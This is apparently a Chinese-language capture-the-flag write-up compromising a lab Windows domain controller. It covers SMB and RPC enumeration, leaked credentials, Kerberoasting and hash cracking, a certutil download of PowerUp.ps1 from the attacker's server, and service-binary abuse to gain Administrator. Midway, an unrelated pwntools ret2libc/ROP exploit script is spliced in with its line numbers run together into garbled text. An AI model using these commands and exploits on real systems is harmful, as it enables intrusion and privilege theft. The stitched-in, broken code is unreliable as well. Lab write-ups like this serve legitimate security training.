靶机ip:10.10.76.81

信息收集

nmap扫描

1
nmap --min-rate 10000 -A -sV -sC -p- 10.10.184.113
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 15:44 CST
Warning: 10.10.184.113 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.184.113
Host is up (0.36s latency).
Not shown: 59956 closed tcp ports (reset), 5552 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-23 07:44:58Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: LAB-ENTERPRISE
|   NetBIOS_Domain_Name: LAB-ENTERPRISE
|   NetBIOS_Computer_Name: LAB-DC
|   DNS_Domain_Name: LAB.ENTERPRISE.THM
|   DNS_Computer_Name: LAB-DC.LAB.ENTERPRISE.THM
|   DNS_Tree_Name: ENTERPRISE.THM
|   Product_Version: 10.0.17763
|_  System_Time: 2024-10-23T07:46:13+00:00
| ssl-cert: Subject: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Not valid before: 2024-10-22T07:43:23
|_Not valid after:  2025-04-23T07:43:23
|_ssl-date: 2024-10-23T07:46:26+00:00; -1s from scanner time.
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7990/tcp  open  http          Microsoft IIS httpd 10.0
|_http-title: Log in to continue - Log in with Atlassian account
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49707/tcp open  msrpc         Microsoft Windows RPC
49713/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=10/23%OT=53%CT=1%CU=31414%PV=Y%DS=2%DC=T%G=Y%TM=671
OS:8A9DA%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=I%CI=RD%II=I%SS=
OS:S%TS=U)SEQ(SP=102%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=102%GCD=
OS:1%ISR=10C%TI=I%CI=RD%II=I%SS=S%TS=U)SEQ(SP=103%GCD=1%ISR=10C%TI=I%CI=I%I
OS:I=I%SS=S%TS=U)OPS(O1=M509NW8NNS%O2=M509NW8NNS%O3=M509NW8%O4=M509NW8NNS%O
OS:5=M509NW8NNS%O6=M509NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=F
OS:F70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M509NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=
OS:Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=
OS:0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-10-23T07:46:15
|_  start_date: N/A

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   359.39 ms 10.14.0.1
2   360.71 ms 10.10.184.113

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.50 seconds

不难看出这是一台域控机器,开放了若干端口,域名为LAB.ENTERPRISE.THM,将其添加到/etc/hosts文件中

image-20241023164242012

SMB

先简单探测下smb服务

1
smbclient -L //10.10.184.113

image-20241023155122981

发现一些共享目录,尝试匿名登陆访问

1
smbclient //10.10.184.113/Docs

image-20241023155511089

发现两个文件get下来

1
smbclient //10.10.184.113/Users

image-20241023155603137

desktop.ini下载下来,同时在Users目录中,找到一些用户名

将用户名保存下来

image-20241023155901976

Default目录中找到些文件,查看一下之前下载的文件

image-20241023160434574

image-20241023160516110

发现这两个文件需要密码才能查看

image-20241023160602672

80端口

image-20241023160110776

默认页面没什么信息,扫描一下后台

image-20241023160710469

image-20241023160753616

没啥用

7990端口

image-20241023162156550

这是一个Atlassian并且发现内容是Enterprise-THM,正在迁移至github,我们上去google搜索一下

image-20241023162718049

image-20241023162813746

注意到有个用户Nik-enterprise-dev,里面有一个库mgmtScript.ps1,库里面还有个ps1文件mgmtScript.ps1

image-20241023163010726

查看一下历史记录

image-20241023163105667

发现了他的用户名及密码nik:ToastyBoi!

rpc

有了一组用户凭据,尝试探测一下rpc,枚举一下用户

1
rpcclient lab.enterprise.thm -U nik --password="ToastyBoi!"

image-20241023190823732

找到很多域用户,将其保存到users文件中,方便后续利用

rdp登录bitbucket

有了一组凭据和用户名列表就可以尝试AS-REP Roasting,检查一下域中用户是否有用户禁用了预身份验证,如果有的话,我们就可以请求TGT密钥,就可以尝试离线破解密钥

1
GetNPUsers.py lab.enterprise.thm/ -usersfile users -dc-ip 10.10.184.113

image-20241023194812832

接下来查看是否有用户设置了SPN,如果有的话,我们可以请求TGS密钥

1
GetUserSPNs.py lab.enterprise.thm/nik:ToastyBoi!

image-20241023185741834

发现bitbucket用户设置了SPN,我们请求TGS并尝试破解

1
GetUserSPNs.py lab.enterprise.thm/nik:ToastyBoi! -request

image-20241023185859159

将上述票据保存为hash,使用john爆破hash

john hash --wordlist=/usr/share/wordlists/rockyou.txt

john hash -show

image-20241023195147299

爆破出密码littleredbucket

rdp尝试登陆

1
xfreerdp /u:bitbucket /p:littleredbucket /v:lab.enterprise.thm

image-20241023202950998

在桌面找到user.txt

提权至root

使用PowerUp.ps1来分析可能提升权限的漏洞,将文件传到靶机上

攻击机启动python服务

image-20241023210705120

从受害者机器上,我们使用certutilPowershell 获取可执行文件:

1
certutil.exe -urlcache -f http://10.14.90.122:8000/PowerUp.ps1 PowerUp.ps1

image-20241024155939035

运行PowerUp.ps1后执行Invoke-AllChecks

1
2
. .\PowerUp.ps1
Invoke-AllChecks

image-20241024161233438

我们发现zerotieroneservice是作为SYSTEM运行的,并且可以重启该服务

使用下面的命令滥用此功能,将当前用户bitbucket添加到管理员组

1
Install-ServiceBinary -Name "zerotieroneservice" -Command "net localgroup Administrators lab.enterprise.thm\bitbucket /add"

image-20241024161951199

执行后,我们重启zerotieroneservice服务

1
2
sc.exe stop zerotieroneservice
sc.exe start zerotieroneservice

xxxxxxxxxx105 1from pwn import2import ctypes3​4​5context(os=‘linux’,arch=‘amd64’,log_level=‘debug’)6libc=ELF(‘./libc.so.6’)   7elf=ELF(‘./vuln’)8#p=remote(“pwn-ecdfbe9bc0.challenge.xctf.org.cn”, 9999, ssl=True)9p=process(‘./vuln’)10​11   12​13​14​15​16def xun():17​18    for i in range(100):19        #print(payload)20        p.recvuntil(b’Input the authentication code:‘)21       #payload = str((elf1.rand()%100) + 1)22       #p.send(payload)23        p.send(p64(elf1.rand()%100+1))24       25       # sleep(0.1)26     27       28rdi=0x000000000040189329#gdb.attach§30#pause31p.send(b’1’)32#sleep(0.5)33elf1=ctypes.CDLL(“./libc.so.6”)34#elf1=ctypes.LoadLibrary(“./libc.so.6”)35elf1.srand(elf1.time(0))    #与题目相同以时间为种子36​37xun()38​39p.sendafter(">> ",p32(1))40p.sendafter("Index: ",p32(1))41p.sendafter("Note: ",b’a’)42​43payload=b’a’(0x100+8)+p64(rdi)+p64(elf.got[‘puts’])+p64(elf.plt[‘puts’])+p64(0x00000000040177B)44#bug()45p.send(payload)46​47libc_base=u64(p.recvuntil(“\x7f”)[-6:].ljust(8,b’\x00’))-libc.sym[‘puts’]48#print(hex(libc_base))49print(hex(libc_base))50​51​52​53rdi = libc_base+0x0000000000023b6a54rsi = libc_base+0x000000000002601f55rdx = libc_base+0x0000000000142c9256rdx_r12=libc_base+0x000000000011921157rax = libc_base+0x000000000003617458ret = libc_base+0x000000000002267959syscall=libc_base+0x000000000002284d60open_=libc_base+libc.sym[‘open’]61read=libc_base + libc.sym[‘read’]62write=libc_base + libc.sym[‘write’]63mprotect=libc_base + libc.sym[‘mprotect’]64bss=0x404060+0x50065​66​67p.send(b’1’)68#sleep(0.5)69elf1=ctypes.CDLL(“./libc.so.6”)70#elf1=ctypes.LoadLibrary(“./libc.so.6”)71elf1.srand(elf1.time(0))    #与题目相同以时间为种子72​73xun()74​75p.sendafter(">> ",p32(1))76p.sendafter("Index: ",p32(1))77p.sendafter("Note: ",b’a’0x100)78​79​80#rl(“lets move and pwn!”)81payload=b’a’(0x100)+p64(bss)+p64(rsi)+p64(bss)+p64(read)+p64(0x0004013EE)82#bug()83p.send(payload)84#pause()85​86orw  = b’/flag\x00\x00\x00’87orw += p64(rdi) + p64(bss)  #/flag的字符串位置,要改88orw += p64(rsi) + p64(0)89orw += p64(open_)90​91orw += p64(rdi) + p64(3)92orw += p64(rdx_r12) + p64(0x50)*293orw += p64(rsi)+p64(bss+0x200) #读入flag的位置94orw += p64(read)95orw += p64(rdi) + p64(1)96orw += p64(rdx_r12) + p64(0x50)*297orw += p64(rsi)+p64(bss+0x200) #读入flag的位置98orw += p64(write)99​100#print(hex(len(orw)))101print(hex(len(orw)))102p.send(orw)103​104​105p.interactive()python

查看一下当前用户

1
net user bitbucket

image-20241024162251879

发现我们当前属于Administrator

使用evil-winrm登录(使用evil-winrm的原因纯粹是因为我rdp登录卡的要死)

1
evil-winrm -i 10.10.76.81 -u bitbucket -p littleredbucket

image-20241024162834485

找到root.txt